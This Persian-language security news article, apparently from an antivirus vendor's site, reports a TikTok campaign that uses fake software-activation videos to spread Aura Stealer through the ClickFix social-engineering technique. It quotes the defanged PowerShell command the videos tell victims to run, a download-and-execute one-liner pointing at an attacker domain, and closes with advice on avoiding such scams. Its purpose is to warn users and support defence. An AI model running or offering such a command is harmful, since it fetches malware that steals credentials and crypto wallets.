لوگوی ارتباط افزار افق
لوگوی ارتباط افزار افق
۰۲۱۹۱۳۰۵۹۷۹
۰۹۰۲۶۳۴۹۶۱۶

TikTok بستر انتشار بدافزار با ویدیوهای فعال‌سازی تقلبی

TikTok-Index

فهرست مطالب

اخیراً کمپینی در TikTokشناسایی شده که در آن ویدیوهایی تحت عنوان راهنمای فعال‌سازی رایگان برای نرم‌افزارهای محبوب منتشر می‌شود.این ویدیوها کاربران را به اجرای دستورات مخرب در سیستمشان تشویق می‌کنند و در نتیجه بدافزارهای سرقت‌کننده اطلاعات، روی دستگاه قربانی نصب می‌شوند و اطلاعات حساس او به سرور مهاجمان فرستاده می‌شود.

به گفتهٔ خاویر مرتنز(Xavier Mertens)، تحلیل‌گر امنیتی در مرکز ISC، الگوی این کمپین تقریباً همانند کمپینی است که شرکت امنیتی Trend Micro در ماه می کشف و مستند کرده بود؛ طبق گزارش این شرکت عاملان این کمپین مهندسی اجتماعی در TikTok از ویدیوهایی استفاده می‌کنند که احتمالاً با ابزارهای هوش مصنوعی ساخته شده‌اند و از کاربران می‌خواهند دستورات خاصی را اجرا کنند که ادعا می‌شود باعث فعال‌سازی ویندوز، مایکروسافت آفیس و قابلیت‌های پرمیوم در نرم‌افزارهای قانونی مانند CapCut و Spotify می‌شود.

نحوه انجام حمله ClickFix در TikTok

این ویدیوها از حمله‌ای به نام ClickFix استفاده می‌کنند. این تکنیک نوعی مهندسی اجتماعی است که مهاجمین ویدیوهای فریبنده (مثلاً در TikTok) منتشر می‌کنند که وانمود می‌کند آموزش فعال‌سازی یا راه‌حل سریع برای نرم‌افزارهای محبوب است.

ویدیو بیننده را تشویق می‌کند متنی کوتاه را در محیط‌هایی مثل PowerShell یا ترمینال اجرا کند؛ این متن ظاهراً ساده است اما باعث می‌شود دستگاه به سروری مخرب وصل شده و بدافزار دانلود و اجرا شود.

 این حمله چطور کار می کند؟

 در هر ویدیو TikTok از کاربران خواسته می‌شود که PowerShell با دسترسی Administrator اجرا کنند و سپس کامندهایی مانند زیر را وارد کنند:

iex (irm slmgr[.]win/photoshop)

نام برنامه در لینک بسته به نرم‌افزاری که تقلبی است تغییر می‌کند (مثلاً Windows به جای Photoshop).

در این کمپین، زمانی که دستور اجرا شود، PowerShell به سایت راه‌دور slmgr[.]win وصل شده و اسکریپت PowerShell دیگری را دریافت و اجرا می‌کند.

نمونه ای از ویدیو های فریب دهندهTikTok

این اسکریپت دو فایل اجرایی را از سرویس Cloudflare Pages دانلود می‌کند. ابتدا یک فایل اجرایی با نام updater.exe دانلود می‌شود که نوعی Aura Stealer است.

این بدافزار اطلاعات ذخیره‌شده در مرورگر، کیف پول‌های رمزارزی و سایر برنامه‌ها را می‌دزدد و برای هکرها می‌فرستد.طبق گفته مرتنز فایل دیگری که دانلود می‌شود source.exe است. این فایل از کامپایلر داخلی Visual C# (.NET) برای کامپایل کد جدید استفاده می‌کند و سپس این کد را در حافظه تزریق و اجرا می‌کند.هدف دقیق این بخش هنوز مشخص نیست.

رشد حملات ClickFix

حملات ClickFix در سال گذشته بسیار رایج شده‌اند و برای انتشار انواع بدافزارها در کمپین‌های باج‌افزار و سرقت رمزارز استفاده می‌شوند. هیچ‌گاه متن را از یک سایت کپی کرده و مستقیماً در PowerShell، CMD، Terminal یا حتی نوار آدرس File Explorer اجرا نکنید.

هشدار مهم برای کاربران

اگر کاربری دستور یا کدی را که در این ویدیوهای TikTok نمایش داده شده اجرا کرده باشد، باید فرض کند که تمام اطلاعات ورود، رمزهای عبور، کوکی‌ها، حساب‌های شبکه‌های اجتماعی، کیف‌پول‌های رمزارزی و اطلاعات مرورگر او در معرض دسترسی مهاجمان قرار گرفته است.در چنین شرایطی لازم است که فوراً رمزهای عبور تمامی حساب‌ها تغییر داده شود.

برای جلوگیری از چنین حملاتی، کاربران باید از اجرای هرگونه دستور یا اسکریپت که از ویدیوها، شبکه‌های اجتماعی، کامنت‌ها، کانال‌های تلگرام یا سایت‌های غیررسمی ارائه می‌شود خودداری کنند؛ حتی اگر آن‌ها ادعا کنند که تنها جهت فعالسازی نرم‌افزار یا افزایش امکانات است.

0 دیدگاه

دیدگاهتان را بنویسید

Avatar placeholder

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

4 × 4 =

ثبت سفارش آنتی‌ویروس سازمانی و دریافت مشاوره رایگان

سفارش آنتی‌ویروس سازمانی خود را ثبت نمایید. کارشناسان ما در اسرع وقت، درخواست شما را بررسی کرده و برای تکمیل فرآیند با شما تماس خواهند گرفت.

ثبت سفارش